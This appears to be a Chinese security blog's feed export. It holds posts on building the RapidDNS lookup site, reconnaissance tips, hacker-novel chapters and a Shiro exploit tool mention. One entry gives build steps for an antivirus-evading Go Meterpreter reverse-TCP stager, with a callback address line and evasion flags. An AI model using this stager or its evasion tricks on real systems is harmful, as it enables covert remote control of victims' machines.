<![CDATA[我是如何低成本建立RapidDNS.io网站的]]>
https://bacde.me/post/RapidDNS-03/
2021-03-22T11:58:23.000Z
大家好!我是BaCde,2020年3月我着手开发RapidDNS这个网站,并于2020年4月1日正式上线。
RapidDNS.io是一个在线域名查询和IP反向查询的网站。有超过25亿条记录,支持5种(A,AAAA,CNAME,MX,CERT)数据类型。到目前为止,网站全球Alexa排名15万左右并累计提供超过1亿次查询。现每月网站流量超过1TB。除此之外网站也被加入到Amass,OneForAll,theHarvester,Sudomy,subfinder,ksubdomain等众多知名开源项目中。
接下来我就跟大家分享建设这个网站的过程。
产生想法
2020年在做子域名收集的开发时,想起了Rapid7的DNS数据。经过对其进行分析后,确认是我需要的内容。于是便有了做一个在线的网站的想法,即方便自己同时又可以方便其他有需要的人。
有了这个想法后就开始计划目标,确定只做子域名查询和IP地址反查。其实在开发时,想自己跑数据,但是资源有限。就决定先以Rapid7的DNS数据来尝试。后续也可根据具体情况在增加功能。
面临的问题
开始实现之前要考虑如何以最低的成本实现最好的效果。最好的效果即在多人同时访问时保证查询速度和系统稳定。因为这将直接决定采用什么样的架构来实现。
先来分析下建设网站需要的东西。包括一个域名和至少一台服务器,用来存放web和数据。数据存储的空间至少要300gb,cpu至少双核,内存至少4g。这是没有增量和保存历史记录的情况。到各家云厂商,idc机房,根据这个配置对比了其价格,最低的服务器成本也要5000块一年(仅是数据存储)。
因为打算做免费网站,这样的成本超出了我的预期,而且也可能性能不够。对于这个数据,国外已经有几篇数据运用的文章。其实现的思路有:1. 采用aws的Athena实现,2. 开源的DNSGrep,包括RapidDNS上线后采用mongodb实现的开源项目等。因为大多数围绕的是子域名查询,没有IP地址反查功能。而且Athena将随着用户数量增加,其费用也将非常恐怖,更适合自用。说了这么多,主要的问题说白了就是穷。
另外一个省钱的思路就是从已有资源来想办法,这时想到了跟随我多年联想的笔记本电脑,它已经吃灰好久了,这是一个可利用的资源。这样只需要再买一个web服务器就可以了。根据之前调查的价格,这样的服务器一年大概需要不到2000块。
但是这就产生了另外一个问题,家里的网络是光纤,没有固定ip地址,而且之前测试发现外网ip是无法直接访问的,映射端口是不行的。做端口转发?这个的性能没测试过,无法保证,也不打算采用。当然这里我想到了一个解决办法,在下面的内容中会讲到。
解决方案
经过上面的考虑,最终我采用下面的结构。后来经过线上的运行情况,稳定性和查询速度还在接受的范围内。后续也可以增加worker和消息队列来支持其他方式的数据增加。
本地服务器就是我的一台笔记本电脑,其配置是3代i7,8G内存。1.2TB的固态硬盘(1TB+250TB两块组成)。数据存储与查询使用的是elasticsearch,前面加了一层nginx,并配置了认证。
外部服务器是一台云主机,配置好为双核4G内存。包括nginx反向代理和Flask做的web查询界面。 外面又加了一层CDN。上面没有公网IP的问题,取了个巧,因为现在家里的网络都支持IPv6,所以外部服务器直接使用IPv6地址直连家里的笔记本电脑。
这里说点额外的,对于IPv6地址是可以直接连接的,不需要做映射。一般我们家里的电脑会分配多个IPv6地址,有至少一个临时(temporary,我们连接其他电脑时使用)的地址和secured的。一般我们可以设置一个固定的即可。这里大家还是注意点,避免泄漏IPv6地址。之前看一篇公众号文章,发现对目标的IPv4地址打码了,却没有对IPv6地址打码,这个挺危险的。
以上这套结构的成本为域名450元,cdn服务器免费的,服务器每月费用20美元(差不多140元),电费每月大概60元。前期投入买了一块三星的SSD,成本1000元。截止目前为止,共投入450+2400+1000=3850元。后续维持现状基本是服务器加域名成本,一年2850元。
编码
需要的一些基础知识:
html+javascript+css基础
python+flask基础
elasticsearch基础
其实想好了方案,而且本身也不复杂,具体编码就相对简单了许多。比如查询界面的开发,我直接找了一套现成的模版,改改样式就可以了。后端flask边看文档边开发就可以了,没啥好说的。唯一要说一下的是这里flask使用了协程,其查询效果好了很多。当然后面跟insight-labs的A牛沟通过可以换bjoern,据说效果很好,不过这个我没测试,感兴趣的可以试试看,看完也可以分享出来让我学习学习。
主要的还是在Elasticsearch这里,这里选择他主要因为我比较熟悉,而且有IP字段类型,做IP段查询时非常方便。这里换乘其他的如mongodb、mysql等也可以。mysql使用myisam,加上Partition问题也不大,Insight-labs的QQ群数据查询就是成功案例。大家可以选择自己擅长的。
后来有朋友过来交流查询速度问题,说他那边的查询速度没我的快。其实主要我这边做了一些优化处理。我在导入数据时,对域名处理,将根域名单独存放一个字段,剩下的部分单独放一个字段。因为不需要模糊匹配,查询速度就会非常快,同时存储空间也可以节省几十G。当然,这牺牲掉了模糊搜索的功能。具体字段可以看下图:
创建mapping:
{
"mappings": {
"domain": {
"properties": {
"name": {
"type": "text"
},
"type": {
"type": "keyword"
},
"value": {
"type": "ip"
},
"domain": {
"type": "keyword"
}
}
}
}
}
最关键的其实是导入程序,也是投入时间最多的,因为数据量比较多。单纯使用bulk速度很慢。使用SSD速度会提高几倍。但是依然达不到预期,因为会出现es内存耗尽,队列太多等各种异常,比如导入到8亿多数据时报错。也尝试通过迭代的方式来实现高性能文件读取,但是最后主要的根源还是在es和字符串的处理上。最后采用多进程方式。elasticsearch设置不刷新,0副本,并调整es的queue,线程,最大内存等参数。这个需要根据自己机器配置去进行调整。通过实际使用一天导入大概10亿条记录,当然还是有优化空间的。
修改index设置的方法:
{
"index": {
"refresh_interval": -1,
"number_of_replicas": 0
}
}
导入完成后在修改回去即可。
以上elasticsearch使用的是6.7.1版本。其他版本可能会有差异,根据实际情况调整即可。
总结
其实总体来说,本文技术上没啥复杂度,实现起来也相对简单。我觉得有点像以前革命时期八路军的风格(完了往自己脸上贴金了,勿喷),在有限的条件下来尽可能实现自己想要的效果。
希望本文对你有所帮助,对于上述内容有任何疑问,可以给我发送消息一起交流。
最后,RapidDNS已经一周年,这一年家人和同事的支持,同学的帮助,以及国内外朋友的称赞和鼓励,才让我坚持维护着网站运行。感谢在网站运行中大家提来的建议和反馈!感谢所有使用RapidDNS的人!感谢你们让RapidDNS更好。
大家也可以关注公众账号,获取最新的网站功能、使用技巧等内容。
]]>
大家好!我是BaCde,2020年3月我着手开发RapidDNS这个网站,并于2020年4月1日正式上线。
RapidDNS.io是一个在线域名查询和IP反向查询的网站。有超过25亿条记录,支持5种(A,AAAA,CNAME,MX,CERT)数据类型。到目前为止,网站全球Alexa排名15万左右并累计提供超过1亿次查询。现每月网站流量超过1TB。除此之外网站也被加入到Amass,OneForAll,theHarvester,Sudomy,subfinder,ksubdomain等众多知名开源项目中。
接下来我就跟大家分享建设这个网站的过程。
产生想法
2020年在做子域名收集的开发时,想起了Rapid7的DNS数据。经过对其进行分析后,确认是我需要的内容。于是便有了做一个在线的网站的想法,即方便自己同时又可以方便其他有需要的人。
有了这个想法后就开始计划目标,确定只做子域名查询和IP地址反查。其实在开发时,想自己跑数据,但是资源有限。就决定先以Rapid7的DNS数据来尝试。后续也可根据具体情况在增加功能。
面临的问题
开始实现之前要考虑如何以最低的成本实现最好的效果。最好的效果即在多人同时访问时保证查询速度和系统稳定。因为这将直接决定采用什么样的架构来实现。
先来分析下建设网站需要的东西。包括一个域名和至少一台服务器,用来存放web和数据。数据存储的空间至少要300gb,cpu至少双核,内存至少4g。这是没有增量和保存历史记录的情况。到各家云厂商,idc机房,根据这个配置对比了其价格,最低的服务器成本也要5000块一年(仅是数据存储)。
因为打算做免费网站,这样的成本超出了我的预期,而且也可能性能不够。对于这个数据,国外已经有几篇数据运用的文章。其实现的思路有:1. 采用aws的Athena实现,2. 开源的DNSGrep,包括RapidDNS上线后采用mongodb实现的开源项目等。因为大多数围绕的是子域名查询,没有IP地址反查功能。而且Athena将随着用户数量增加,其费用也将非常恐怖,更适合自用。说了这么多,主要的问题说白了就是穷。
另外一个省钱的思路就是从已有资源来想办法,这时想到了跟随我多年联想的笔记本电脑,它已经吃灰好久了,这是一个可利用的资源。这样只需要再买一个web服务器就可以了。根据之前调查的价格,这样的服务器一年大概需要不到2000块。
但是这就产生了另外一个问题,家里的网络是光纤,没有固定ip地址,而且之前测试发现外网ip是无法直接访问的,映射端口是不行的。做端口转发?这个的性能没测试过,无法保证,也不打算采用。当然这里我想到了一个解决办法,在下面的内容中会讲到。
解决方案
经过上面的考虑,最终我采用下面的结构。后来经过线上的运行情况,稳定性和查询速度还在接受的范围内。后续也可以增加worker和消息队列来支持其他方式的数据增加。
本地服务器就是我的一台笔记本电脑,其配置是3代i7,8G内存。1.2TB的固态硬盘(1TB+250TB两块组成)。数据存储与查询使用的是elasticsearch,前面加了一层nginx,并配置了认证。
外部服务器是一台云主机,配置好为双核4G内存。包括nginx反向代理和Flask做的web查询界面。 外面又加了一层CDN。上面没有公网IP的问题,取了个巧,因为现在家里的网络都支持IPv6,所以外部服务器直接使用IPv6地址直连家里的笔记本电脑。
这里说点额外的,对于IPv6地址是可以直接连接的,不需要做映射。一般我们家里的电脑会分配多个IPv6地址,有至少一个临时(temporary,我们连接其他电脑时使用)的地址和secured的。一般我们可以设置一个固定的即可。这里大家还是注意点,避免泄漏IPv6地址。之前看一篇公众号文章,发现对目标的IPv4地址打码了,却没有对IPv6地址打码,这个挺危险的。
以上这套结构的成本为域名450元,cdn服务器免费的,服务器每月费用20美元(差不多140元),电费每月大概60元。前期投入买了一块三星的SSD,成本1000元。截止目前为止,共投入450+2400+1000=3850元。后续维持现状基本是服务器加域名成本,一年2850元。
编码
需要的一些基础知识:
html+javascript+css基础
python+flask基础
elasticsearch基础
其实想好了方案,而且本身也不复杂,具体编码就相对简单了许多。比如查询界面的开发,我直接找了一套现成的模版,改改样式就可以了。后端flask边看文档边开发就可以了,没啥好说的。唯一要说一下的是这里flask使用了协程,其查询效果好了很多。当然后面跟insight-labs的A牛沟通过可以换bjoern,据说效果很好,不过这个我没测试,感兴趣的可以试试看,看完也可以分享出来让我学习学习。
主要的还是在Elasticsearch这里,这里选择他主要因为我比较熟悉,而且有IP字段类型,做IP段查询时非常方便。这里换乘其他的如mongodb、mysql等也可以。mysql使用myisam,加上Partition问题也不大,Insight-labs的QQ群数据查询就是成功案例。大家可以选择自己擅长的。
后来有朋友过来交流查询速度问题,说他那边的查询速度没我的快。其实主要我这边做了一些优化处理。我在导入数据时,对域名处理,将根域名单独存放一个字段,剩下的部分单独放一个字段。因为不需要模糊匹配,查询速度就会非常快,同时存储空间也可以节省几十G。当然,这牺牲掉了模糊搜索的功能。具体字段可以看下图:
创建mapping:
{
"mappings": {
"domain": {
"properties": {
"name": {
"type": "text"
},
"type": {
"type": "keyword"
},
"value": {
"type": "ip"
},
"domain": {
"type": "keyword"
}
}
}
}
}
最关键的其实是导入程序,也是投入时间最多的,因为数据量比较多。单纯使用bulk速度很慢。使用SSD速度会提高几倍。但是依然达不到预期,因为会出现es内存耗尽,队列太多等各种异常,比如导入到8亿多数据时报错。也尝试通过迭代的方式来实现高性能文件读取,但是最后主要的根源还是在es和字符串的处理上。最后采用多进程方式。elasticsearch设置不刷新,0副本,并调整es的queue,线程,最大内存等参数。这个需要根据自己机器配置去进行调整。通过实际使用一天导入大概10亿条记录,当然还是有优化空间的。
修改index设置的方法:
{
"index": {
"refresh_interval": -1,
"number_of_replicas": 0
}
}
导入完成后在修改回去即可。
以上elasticsearch使用的是6.7.1版本。其他版本可能会有差异,根据实际情况调整即可。
总结
其实总体来说,本文技术上没啥复杂度,实现起来也相对简单。我觉得有点像以前革命时期八路军的风格(完了往自己脸上贴金了,勿喷),在有限的条件下来尽可能实现自己想要的效果。
希望本文对你有所帮助,对于上述内容有任何疑问,可以给我发送消息一起交流。
最后,RapidDNS已经一周年,这一年家人和同事的支持,同学的帮助,以及国内外朋友的称赞和鼓励,才让我坚持维护着网站运行。感谢在网站运行中大家提来的建议和反馈!感谢所有使用RapidDNS的人!感谢你们让RapidDNS更好。
大家也可以关注公众账号,获取最新的网站功能、使用技巧等内容。
]]>
<![CDATA[RapidDNS.IO 网站应用实例]]>
https://bacde.me/post/rapiddnsio-tips/
2021-03-11T02:23:49.000Z
大家好,我是BaCde。公众号开通了2个月,一直没发内容。本来计划写写网站建设思路,今天先写一篇网站的使用分享。
网站自发布以来,一直没有什么说明和教程。因为它的功能非常单一,不需要做太多介绍。但是呢,有一些小细节和场景,我觉得可以分享下。
首先,网站基础功能可以查询网站子域名,根据IP地址或IP段查询绑定的域名信息,这里支持IPv6的地址和地址段。目前最大支持显示1万条(大多数情况下足够了)。其中查询结果页面中有导出csv的功能,可以导出全部结果。其实不导出,查询全部结果只需要加入参数?full=1即可。目前大多数开源工具采集时采用也是这样的方式。
下面来说下实际应用场景。
信息收集
在收集ASN信息时,可以根据反向IP段查询,迅速确定筛选出目标的资产。
比如下图中搜索到的腾讯结果中,有很多ip段时属于腾讯云服务的机器,这些IP对我们挖掘漏洞来说,意义不大。但是可能又会存在夹杂在其中的个别目标。这时候就可以使用Reverse IP功能进行查询,然后筛选出目标或者筛选IP段。
下面随便挑了一个(58.87.64.0/18)查询结果来展示下,发现大多数不是腾讯的域名,则可以跳过,或者从中筛选出腾讯的。
溯源定位
这里主要说两个场景,第一个就是扫到某个IP存在漏洞,想知道哪个厂商的,第二个就是对于攻击IP地址是属于哪个机构的。这是两个非常常见的需求。
这里一种方法是直接查询IP地址,那么,当ip地址查不到时怎么办呢?
今天就在微信群里遇到一个例子。有人在日志中发现了360某团队的一个dnslog的地址,但是打开其域名时一个空白地址。这里我通过获取到解析的IP地址,查询C段,然后很快速的发现了dnslog平台的登录地址,根据版权信息确认是360的。
其发现的地址形如:xxx.b.nslog.0kee.360.cn。访问nslog.0kee.360.cn为空白,其解析的IP地址为123.59.211.124。通过RapidDNS来查询C段,查询链接:https://rapiddns.io/sameip/123.59.211.124/24#result。
在结果中可以发现一个0kdns.net的域名,访问后就是dnslog平台登录地址。
好了,以上就是我经常使用到的方法,跟大家分享出来。另外,网站由于网络原因,可能会不太稳定。有问题大家可即时反馈,看到后我会第一时间来解决。
扫描篇下方二维码可关注公众号
大家好,我是BaCde。公众号开通了2个月,一直没发内容。本来计划写写网站建设思路,今天先写一篇网站的使用分享。
网站自发布以来,一直没有什么说明和教程。因为它的功能非常单一,不需要做太多介绍。但是呢,有一些小细节和场景,我觉得可以分享下。
首先,网站基础功能可以查询网站子域名,根据IP地址或IP段查询绑定的域名信息,这里支持IPv6的地址和地址段。目前最大支持显示1万条(大多数情况下足够了)。其中查询结果页面中有导出csv的功能,可以导出全部结果。其实不导出,查询全部结果只需要加入参数?full=1即可。目前大多数开源工具采集时采用也是这样的方式。
下面来说下实际应用场景。
信息收集
在收集ASN信息时,可以根据反向IP段查询,迅速确定筛选出目标的资产。
比如下图中搜索到的腾讯结果中,有很多ip段时属于腾讯云服务的机器,这些IP对我们挖掘漏洞来说,意义不大。但是可能又会存在夹杂在其中的个别目标。这时候就可以使用Reverse IP功能进行查询,然后筛选出目标或者筛选IP段。
下面随便挑了一个(58.87.64.0/18)查询结果来展示下,发现大多数不是腾讯的域名,则可以跳过,或者从中筛选出腾讯的。
溯源定位
这里主要说两个场景,第一个就是扫到某个IP存在漏洞,想知道哪个厂商的,第二个就是对于攻击IP地址是属于哪个机构的。这是两个非常常见的需求。
这里一种方法是直接查询IP地址,那么,当ip地址查不到时怎么办呢?
今天就在微信群里遇到一个例子。有人在日志中发现了360某团队的一个dnslog的地址,但是打开其域名时一个空白地址。这里我通过获取到解析的IP地址,查询C段,然后很快速的发现了dnslog平台的登录地址,根据版权信息确认是360的。
其发现的地址形如:xxx.b.nslog.0kee.360.cn。访问nslog.0kee.360.cn为空白,其解析的IP地址为123.59.211.124。通过RapidDNS来查询C段,查询链接:https://rapiddns.io/sameip/123.59.211.124/24#result。
在结果中可以发现一个0kdns.net的域名,访问后就是dnslog平台登录地址。
好了,以上就是我经常使用到的方法,跟大家分享出来。另外,网站由于网络原因,可能会不太稳定。有问题大家可即时反馈,看到后我会第一时间来解决。
扫描篇下方二维码可关注公众号
<![CDATA[原创小说《杀手》第十章 逃]]>
https://bacde.me/post/Killer-Chapter-Ten/
2020-03-21T10:38:28.000Z
我不相信造化弄人。世界上出类拔萃的人,都主动找寻他们想要的环境。要是遍寻不获,他们就创造一个。 ——萧伯纳
王梓家中
结果往往在一个人做选择的时候就已经注定。危险正在一点一点向王梓靠近。买家提出的线下交易,对于网络杀手走入现实,那么就以为着自杀。羸弱的王梓,能打得过谁呢。除此之外,还很有可能就像阿桑奇被捕时的样子。那一副银白色手镯想想都觉得冰冷。王梓不禁打了一个冷颤。
当下,王梓没有太多的时间想这些,他必须要走下去。就算没有出路,那么也要走出一条自己的路。
普通的夜晚,大多数人已进入梦乡。王梓在电脑前敲击着键盘,眼镜上可以看到映射出的一行行代码,电脑的usb口上连接着一台树莓派上。此时编写的程序就是即将在这台微型电脑上运行的。流动的代码仿佛在与时间赛跑,慢一步就可能被超过而崩溃。
不知不觉,清晨的朝阳照亮了阳台,温暖而不炙热。随着最后一次回车键按响,程序也可以正常运行起来。就要离开这里了,收起桌上的两台笔记本电脑、U盘、望远镜、还有插在电脑上的树莓派装到背包里。将手机放到了微波炉里,并放在了电脑旁。王梓走出房子,电脑正常运行着。
站在天台上,阳光照射全身,一股暖意袭遍王梓的全身。好难得的时光。可惜,马上就要走了。王梓找了快隐蔽的可以放进树莓派的地方,把树莓派放好,然后把太阳能天池板放到外面。可以为树莓派续航。
王梓拿起了一部新手机,拨通了小楠的电话。响了三声,电话接通了。传来了带有起床气的一声喂,哪位?。
]]>我不相信造化弄人。世界上出类拔萃的人,都主动找寻他们想要的环境。要是遍寻不获,他们就创造一个。 ——萧伯纳
王梓家中
结果往往在一个人做选择的时候就已经注定。危险正在一点一点向王梓靠近。买家提出的线下交易,对于网络杀手走入现实,那么就以为着自杀。羸弱的王梓,能打得过谁呢。除此之外,还很有可能就像阿桑奇被捕时的样子。那一副银白色手镯想想都觉得冰冷。王梓不禁打了一个冷颤。
当下,王梓没有太多的时间想这些,他必须要走下去。就算没有出路,那么也要走出一条自己的路。
普通的夜晚,大多数人已进入梦乡。王梓在电脑前敲击着键盘,眼镜上可以看到映射出的一行行代码,电脑的usb口上连接着一台树莓派上。此时编写的程序就是即将在这台微型电脑上运行的。流动的代码仿佛在与时间赛跑,慢一步就可能被超过而崩溃。
不知不觉,清晨的朝阳照亮了阳台,温暖而不炙热。随着最后一次回车键按响,程序也可以正常运行起来。就要离开这里了,收起桌上的两台笔记本电脑、U盘、望远镜、还有插在电脑上的树莓派装到背包里。将手机放到了微波炉里,并放在了电脑旁。王梓走出房子,电脑正常运行着。
站在天台上,阳光照射全身,一股暖意袭遍王梓的全身。好难得的时光。可惜,马上就要走了。王梓找了快隐蔽的可以放进树莓派的地方,把树莓派放好,然后把太阳能天池板放到外面。可以为树莓派续航。
王梓拿起了一部新手机,拨通了小楠的电话。响了三声,电话接通了。传来了带有起床气的一声喂,哪位?。
]]>
<![CDATA[原创小说《杀手》第六章 阴与阳 0与1 攻与防]]>
https://bacde.me/post/Killer-Chapter-Six/
2020-03-18T08:51:21.000Z
自然界一切事物的运动,无一不是阴阳的对立统一。人的生命运动,其本身就是阴阳对立双方,在不断的矛盾运动中取得统一的过程。
夜深了,天气有些阴沉,有些发闷,让人感觉呼吸困难。路上还有几个刚刚下班的人往家里走,他们看上去有些疲惫,不时有几辆车呼啸而过。没过多久,狂风大作,电闪雷鸣,路边的树枝开始疯狂的摇头。很快无情的雨点从天空中落下,打在了正在赶路人的身上,人们纷纷拿着自己的包顶在头顶奔跑起来。这突如其来的一场大雨,拦住了深夜要赶回家的人,也惊醒了许多刚刚入睡的人们,还有那些害怕打雷无法入睡的人们。
风雨总是短暂的,下了一整夜的雨,清晨的空气变得清新起来,王梓伸了一个懒腰,然后拉开了窗帘,外面的阳光飞速的跑进屋内,填满整个卧室。打开窗,一股清爽的空气扑面而来,瞬间让人神清气爽。风雨过后总是会迎来美好,又或者给人们带来些许惊喜,比如雨后彩虹。
在这样一个美好的早晨,给人的心情也自然是不一样的,王梓准备下楼去公园转转。宅了许久,也应该出去呼吸一下外面的新鲜空气了。简单洗漱下,换了件宽松的衣服王梓救下楼了。
公园内都是些年纪较大的人,有的在空地上打羽毛球,有的老大爷站在树旁,不断用自己侧面的身体撞向树,然后弹回来,在撞过去,一会在用后背重复刚才的动作。有的老大妈则站在树下练习着嗓子。王梓心里想着当自己老了的时候是否也是差不多的样子,想想,自己摇摇头笑了。继续向前走,不远处可以看到有一群老年人,他们动作轻柔又缓慢,有的还穿着武术服,旁边有一个小音箱播放着音乐。在看最前面的那个人,大概60岁左右的样子,穿了一身黑色武术服,深深的眉毛,眼睛随着他的手移动着,他的动作圆活,连绵不绝,步伐轻盈如行云流水。王梓被这个老大爷吸引住了,觉得很帅气,便多看了会,心中感叹,原来太极拳是这样的优美。过了10多分钟结束了。老大爷走到旁边的凳子旁,从包里拿出一条毛巾来擦头上的汗。
“大爷,您打的拳简直太漂亮了。”王梓走上前去赞美起大爷。
“怎么,小伙子,你感兴趣?”大爷反问道。
“我是看您打,真的很美。吸引了我。” 王梓回复道。
“太极拳需要常年联系,对人身体有很大的益处,别人动作轻柔缓慢,但是,把每一个动作做到优雅,灵活,必须要要用力。你看我这么大年纪,身体一直很好,比起你们一些年轻人都要好呢。就说你们现在这些年轻人整天就知道对着电脑和手机,又爱熬夜,身体还不如我这个老头子呢。”
]]>自然界一切事物的运动,无一不是阴阳的对立统一。人的生命运动,其本身就是阴阳对立双方,在不断的矛盾运动中取得统一的过程。
夜深了,天气有些阴沉,有些发闷,让人感觉呼吸困难。路上还有几个刚刚下班的人往家里走,他们看上去有些疲惫,不时有几辆车呼啸而过。没过多久,狂风大作,电闪雷鸣,路边的树枝开始疯狂的摇头。很快无情的雨点从天空中落下,打在了正在赶路人的身上,人们纷纷拿着自己的包顶在头顶奔跑起来。这突如其来的一场大雨,拦住了深夜要赶回家的人,也惊醒了许多刚刚入睡的人们,还有那些害怕打雷无法入睡的人们。
风雨总是短暂的,下了一整夜的雨,清晨的空气变得清新起来,王梓伸了一个懒腰,然后拉开了窗帘,外面的阳光飞速的跑进屋内,填满整个卧室。打开窗,一股清爽的空气扑面而来,瞬间让人神清气爽。风雨过后总是会迎来美好,又或者给人们带来些许惊喜,比如雨后彩虹。
在这样一个美好的早晨,给人的心情也自然是不一样的,王梓准备下楼去公园转转。宅了许久,也应该出去呼吸一下外面的新鲜空气了。简单洗漱下,换了件宽松的衣服王梓救下楼了。
公园内都是些年纪较大的人,有的在空地上打羽毛球,有的老大爷站在树旁,不断用自己侧面的身体撞向树,然后弹回来,在撞过去,一会在用后背重复刚才的动作。有的老大妈则站在树下练习着嗓子。王梓心里想着当自己老了的时候是否也是差不多的样子,想想,自己摇摇头笑了。继续向前走,不远处可以看到有一群老年人,他们动作轻柔又缓慢,有的还穿着武术服,旁边有一个小音箱播放着音乐。在看最前面的那个人,大概60岁左右的样子,穿了一身黑色武术服,深深的眉毛,眼睛随着他的手移动着,他的动作圆活,连绵不绝,步伐轻盈如行云流水。王梓被这个老大爷吸引住了,觉得很帅气,便多看了会,心中感叹,原来太极拳是这样的优美。过了10多分钟结束了。老大爷走到旁边的凳子旁,从包里拿出一条毛巾来擦头上的汗。
“大爷,您打的拳简直太漂亮了。”王梓走上前去赞美起大爷。
“怎么,小伙子,你感兴趣?”大爷反问道。
“我是看您打,真的很美。吸引了我。” 王梓回复道。
“太极拳需要常年联系,对人身体有很大的益处,别人动作轻柔缓慢,但是,把每一个动作做到优雅,灵活,必须要要用力。你看我这么大年纪,身体一直很好,比起你们一些年轻人都要好呢。就说你们现在这些年轻人整天就知道对着电脑和手机,又爱熬夜,身体还不如我这个老头子呢。”
]]>
<![CDATA[原创小说《杀手》第三章 追踪]]>
https://bacde.me/post/Killer-Chapter-Three/
2020-03-13T06:39:50.000Z
Jack来到了天成网络公司的总部,他身穿一身白色衬衫,一条浅蓝色牛仔裤,整个人看上去非常的精神。到达后公司的人热情招待,但是Jack则直接拒绝了,要求立刻就要开始进行分析追踪。因为这对他来说,是一次有趣的挑战。他有些迫不及待是一个什么样的人干了这件事情。
首先询问了系统部人员的一些网络架构。以及现在企业内部所做的全防护措施。接着他有询问了更加具体的信息,其中包含了文件保存的位置,以及发生的时间点等。通过快速的对话沟通,Jack了解了对方的网络一个大概的安全状况。
他跟对方的技术负责人说道:“你们现在的网络情况相对来说做的非常不错,你们目前忽略了公司员工的安全意识,以及目前网络并没有对外流出数据进行一个很好的监控。这使的黑客有机可乘。”
“哎呦,您真的是太专业的,我们已经把我们所了解到的都利用上了,同时我们也经常找安全团队来对我们的系统进行入侵测试。然而他们并没有发现什么内容。发现的我们也都已经修复了。”系统部负责人拍了下大腿,高兴的对Jack说道。因为他似乎看到了希望,看到了眼前这个人可以查出入侵者,这样他也就不会被炒鱿鱼了。
“如果真的如你说的这般,这次的攻击者也是花了很大的代价来入侵你们,看来对方是真的下了血本,想置你们公司于死地啊。”放心,这次我一定要帮助你们找到真凶。他更加的想要知道究竟是什么样人了。
“能有您的加入,那真的是太好了,有什么需要帮助的,需要我们提供的,您就尽管说。我们一定全力配合您。”
“好,那我们废话不多说,开始吧。”
“好,小王,给Jack倒一杯咖啡。”
说着Jack找了个空位置,很不客气的就坐下了,从他的背包中拿出了自己的thinkpad笔记本。上面有一个blackhat的贴纸,看上去非常的酷。
]]>
Jack来到了天成网络公司的总部,他身穿一身白色衬衫,一条浅蓝色牛仔裤,整个人看上去非常的精神。到达后公司的人热情招待,但是Jack则直接拒绝了,要求立刻就要开始进行分析追踪。因为这对他来说,是一次有趣的挑战。他有些迫不及待是一个什么样的人干了这件事情。
首先询问了系统部人员的一些网络架构。以及现在企业内部所做的全防护措施。接着他有询问了更加具体的信息,其中包含了文件保存的位置,以及发生的时间点等。通过快速的对话沟通,Jack了解了对方的网络一个大概的安全状况。
他跟对方的技术负责人说道:“你们现在的网络情况相对来说做的非常不错,你们目前忽略了公司员工的安全意识,以及目前网络并没有对外流出数据进行一个很好的监控。这使的黑客有机可乘。”
“哎呦,您真的是太专业的,我们已经把我们所了解到的都利用上了,同时我们也经常找安全团队来对我们的系统进行入侵测试。然而他们并没有发现什么内容。发现的我们也都已经修复了。”系统部负责人拍了下大腿,高兴的对Jack说道。因为他似乎看到了希望,看到了眼前这个人可以查出入侵者,这样他也就不会被炒鱿鱼了。
“如果真的如你说的这般,这次的攻击者也是花了很大的代价来入侵你们,看来对方是真的下了血本,想置你们公司于死地啊。”放心,这次我一定要帮助你们找到真凶。他更加的想要知道究竟是什么样人了。
“能有您的加入,那真的是太好了,有什么需要帮助的,需要我们提供的,您就尽管说。我们一定全力配合您。”
“好,那我们废话不多说,开始吧。”
“好,小王,给Jack倒一杯咖啡。”
说着Jack找了个空位置,很不客气的就坐下了,从他的背包中拿出了自己的thinkpad笔记本。上面有一个blackhat的贴纸,看上去非常的酷。
]]>
<![CDATA[Golang实现的x86下的Meterpreter reverse tcp]]>
https://bacde.me/post/golang-x86-meterpreter-reverse-tcp/
2020-02-23T04:42:11.000Z
Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter
做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。
使用方法
修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。
set GOARCH=386
go build -ldflags="-H windowsgui -w"
注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。
由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。
免杀效果
加入了Bypass AV的代码。
我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。
今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。
VT检测结果地址:https://www.virustotal.com/gui/file/f8ff4acac418e6cdc326d0139ba2bdb9fce32558985962cf8303fcc97b9e47fb/detection
在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。
]]>
Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter
做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。
使用方法
修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。
set GOARCH=386
go build -ldflags="-H windowsgui -w"
注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。
由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。
免杀效果
加入了Bypass AV的代码。
我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。
今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。
VT检测结果地址:https://www.virustotal.com/gui/file/f8ff4acac418e6cdc326d0139ba2bdb9fce32558985962cf8303fcc97b9e47fb/detection
在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。
]]>
<![CDATA[Apache Shiro 反序列化漏洞利用工具使用]]>
https://bacde.me/post/Apache-Shiro-Deserialize-Vulnerability-Tool/
2020-02-15T06:02:42.000Z
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。
工具下载地址:Shiro_Exploit
